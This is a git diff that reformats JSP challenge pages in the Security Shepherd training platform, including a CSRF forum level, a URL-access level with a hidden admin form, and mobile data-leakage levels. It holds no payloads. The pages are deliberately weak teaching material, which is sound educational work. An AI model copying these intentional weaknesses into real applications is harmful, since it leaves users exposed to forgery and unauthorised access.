-            <%= bundle.getString("challenge.withTheseParameters") %>
-        <a>userId = <%= bundle.getString("challenge.userIdExample") %>
-        </a> &
-        <a>csrfToken = <%= bundle.getString("challenge.yourCsrfTokenCamelCase") %>
-        </a>
-        <br/> <br/>
-            <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>
-            <%= bundle.getString("challenge.userIdExample") %>
-            <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>
-            <%=bundle.getString("challenge.yourIdIs") %>
-            <%= userId %>
-            <%= bundle.getString("challenge.yourIdIs.1") %>
-        <br/> <br/>
-            <%= bundle.getString("challenge.useForumForIframe") %>
-            <%
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.intro") %>
+			<br /> <br /> <a> POST /user/csrfchallengesix/plusplus</a> <br />
+			<%= bundle.getString("challenge.withTheseParameters") %>
+			<a>userId = <%= bundle.getString("challenge.userIdExample") %></a> &
+			<a>csrfToken = <%= bundle.getString("challenge.yourCsrfTokenCamelCase") %></a>
+			<br /> <br />
+			<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>
+			<%= bundle.getString("challenge.userIdExample") %><%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>
+			<%=bundle.getString("challenge.yourIdIs") %>
+			<%= userId %>
+			<%= bundle.getString("challenge.yourIdIs.1") %>
+			<br /> <br />
+			<%= bundle.getString("challenge.useForumForIframe") %>
+			<% 
 				String moduleId = Getter.getModuleIdFromHash(ApplicationRoot, levelHash);	
 				if (Getter.isCsrfLevelComplete(ApplicationRoot, moduleId, userId)) 
 				{ %>
+		
+		<h2 class='title'><%= bundle.getString("result.challengeCompleted") %></h2>
+		<p>
+			<%= bundle.getString("result.congratsTheKeyIs") %>
+			<b> <a><%=	Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String)ses.getAttribute("userName")) %></a></b><br />
+			<br />
+			<% } %>
+		
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("forum.iframe.whatToDo") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="myMessageAris"
+						type="text" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("forum.postMessage") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <h2 class='title'><%= bundle.getString("result.challengeCompleted") %>
-    </h2>
-    <p>
-            <%= bundle.getString("result.congratsTheKeyIs") %>
-        <b>
-            <a><%=    Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String) ses.getAttribute("userName")) %>
-            </a></b><br/>
-        <br/>
-            <% } %>
-
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("forum.iframe.whatToDo") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="myMessageAris"
-                           type="text"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("forum.postMessage") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv">
-        <%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
-    </div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theMessage = $("#myMessageAris").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    myMessage: theMessage,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv">
+			<%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theMessage = $("#myMessageAris").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							myMessage: theMessage,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/362f84cf26bf96aeae358d5d0bbee31e9291aaa5367594c29b3af542a7572c01.jsp b/src/main/webapp/challenges/362f84cf26bf96aeae358d5d0bbee31e9291aaa5367594c29b3af542a7572c01.jsp
index 4935d0a70..306cd002d 100644
--- a/src/main/webapp/challenges/362f84cf26bf96aeae358d5d0bbee31e9291aaa5367594c29b3af542a7572c01.jsp
+++ b/src/main/webapp/challenges/362f84cf26bf96aeae358d5d0bbee31e9291aaa5367594c29b3af542a7572c01.jsp
@@ -1,92 +1,99 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Insecure Data Storage 1";
+String levelName = "Mobile Insecure Data Storage 1";
 //Alphanumeric Only
-    String levelHash = "362f84cf26bf96aeae358d5d0bbee31e9291aaa5367594c29b3af542a7572c01";
+String levelHash = "362f84cf26bf96aeae358d5d0bbee31e9291aaa5367594c29b3af542a7572c01";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.insecureData.insecureDataStrings", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.insecureData.insecureDataStrings", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge1.challengeName");
-    String paragraph1 = bundle.getString("challenge1.para1");
+String LevelName = bundle.getString("challenge1.challengeName");
+String paragraph1 = bundle.getString("challenge1.para1");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= levelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= levelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= levelName %>
-    </h2>
-    <p>
-        <br/>
-        <%= paragraph1 %>
-        <br/> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " InsecureData1.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= levelName %></h2>
+		<p>
+			<br />
+			<%= paragraph1 %>
+			<br /> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " InsecureData1.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
 
-    </p>
-</div>
+		</p>
+	</div>
 
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.jsp b/src/main/webapp/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.jsp
index 0b90e2afa..e76c8b7a3 100644
--- a/src/main/webapp/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.jsp
+++ b/src/main/webapp/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.jsp
@@ -1,162 +1,174 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 //No Quotes In level Name
-    String levelName = "Failure To Restrict URL Access Challenge 1";
+String levelName = "Failure To Restrict URL Access Challenge 1";
 //Alphanumeric Only
-    String levelHash = "4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99";
+String levelHash = "4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.urlAccess." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.urlAccess." + levelHash, locale);
 //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
-
+String translatedLevelName = bundle.getString("challenge.challengeName");
+	
 //Level blurb can be writen here in HTML OR go into the HTML body and write it there. Nobody will update this but you
-    String levelBlurb = "";
+String levelBlurb = "";
 //Logs the IP, Forwarded IP that acceeded this level with the level name in the debug for convience. If you want to log more stuff in the JSP use this as an example
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/> <br/>
-            <%= bundle.getString("challenge.form.instruction") %>
-        <!-- <%= bundle.getString("challenge.form.instruction.comment") %>  -->
-        <br/> <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.getStatus") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    userData: "4816283",
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br /> <br />
+			<%= bundle.getString("challenge.form.instruction") %>
+			<!-- <%= bundle.getString("challenge.form.instruction.comment") %>  -->
+			<br /> <br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.getStatus") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %></p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    $("#leAdminForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>2",
-                data: {
-                    userData: "4816283",
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							userData: "4816283", 
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+			
+			$("#leAdminForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>2",
+						data: {
+							userData: "4816283", 
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/517622a535ff89f7d90674862740b48f53aad7b41390fe46c6f324fee748d136.jsp b/src/main/webapp/challenges/517622a535ff89f7d90674862740b48f53aad7b41390fe46c6f324fee748d136.jsp
index 0c82e9e90..86d9958ad 100644
--- a/src/main/webapp/challenges/517622a535ff89f7d90674862740b48f53aad7b41390fe46c6f324fee748d136.jsp
+++ b/src/main/webapp/challenges/517622a535ff89f7d90674862740b48f53aad7b41390fe46c6f324fee748d136.jsp
@@ -1,95 +1,102 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Unintended Data Leakage 1";
+String levelName = "Mobile Unintended Data Leakage 1";
 //Alphanumeric Only
-    String levelHash = "517622a535ff89f7d90674862740b48f53aad7b41390fe46c6f324fee748d136";
+String levelHash = "517622a535ff89f7d90674862740b48f53aad7b41390fe46c6f324fee748d136";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.unintendedDataLeakage.dataLeakage", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.unintendedDataLeakage.dataLeakage", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge1.challengeName");
-    String paragraph1 = bundle.getString("challenge1.para1");
+String LevelName = bundle.getString("challenge1.challengeName");
+String paragraph1 = bundle.getString("challenge1.para1");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%=LevelName%>
-    </title>
